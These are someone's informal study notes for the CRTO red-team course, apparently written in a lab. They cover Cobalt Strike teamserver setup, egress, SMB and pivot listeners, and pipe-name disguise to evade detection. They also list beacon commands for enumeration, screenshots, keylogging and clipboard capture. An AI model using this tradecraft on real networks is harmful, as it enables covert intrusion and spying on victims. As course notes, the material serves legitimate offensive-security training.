This is a temporary notes while I finished the course then I moved to
How to set up the Team Server
#Start the teamserver and run as service
Intrusionz3r0@htb[/crto]$ sudo ./teamserver <Attacker-Box> <Password-TeamServer> c2-profiles/normal/webbug.profile
Launch cobalt strike client from the taskbar and enter the next details as follows:
Setting up DNS records for DNS based beacon payloads
Cobalt Funcionalities
Listeners
There are two main types of listeners:
Egress Listeners: These let Beacons talk to the hacker's server from outside the target network, like using the internet. The most common types are:
HTTP/S: Beacons communicate using web traffic (like visiting a website).
DNS: Beacons hide their messages in DNS requests (like asking for a website's address).
Peer-to-Peer Listeners: These are for communication inside the same network, where Beacons talk directly to each other instead of calling the main server.
How to Set Up an Listener:
Click Add (Below bar), choose Beacon HTTP/DNS/TCP/SMB, and name it (something easy to remember).
Add the server's IP or domain name Ex: nickelviper.com
Setting up the SMB Listener
Default pipe name is quite well signatured. A good strategy is to emulate names known to be used by common applications or Windows itself.
PS C:\> ls \\.\pipe\
Select one for example: TSVCPIPE-4036c92b-65ae-4601-1337-57f7b24a0c57
Change the final 4 characters: TSVCPIPE-4036c92b-65ae-4601-1337-57f7b24aAAAA
When Create the listener you have to specify it inside Pipename (C2) field.
Pivot Listeners
Pivot Listeners are an advanced Cobalt Strike feature that lets you use an already compromised Beacon as a "bridge" to reach other internal systems in a network.
The longer the sleep, the healthier the beacon due to less communication and stealth.
#Show help menu
beacon> help
beacon> help sleep
#Modify sleep communication time
beacon> sleep 5
beacon> sleep 0 #Interactive mode (real time)
#Connect to Beacond bind TCP connection
beacon> connect [localhost|ip|hostname] PORT
Notes for CRTO
Initial Recoinassense
Identify security solutions in placed through the system.
# List the proccess running on the system
beacon> ps
#Enumerate users that are currently logged on the machine.
beacon> net logons
# Collect information about security configuration
beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe -group=system
#Take screenshots (View > screenshots)
beacon> printscreen
beacon> printshot
beacon> screenwatch
#Enable keylogger.
beacon> keylogger
beacon> jobs
beacon> jobkill 6
#Copy data from clipboard
beacon> clipboard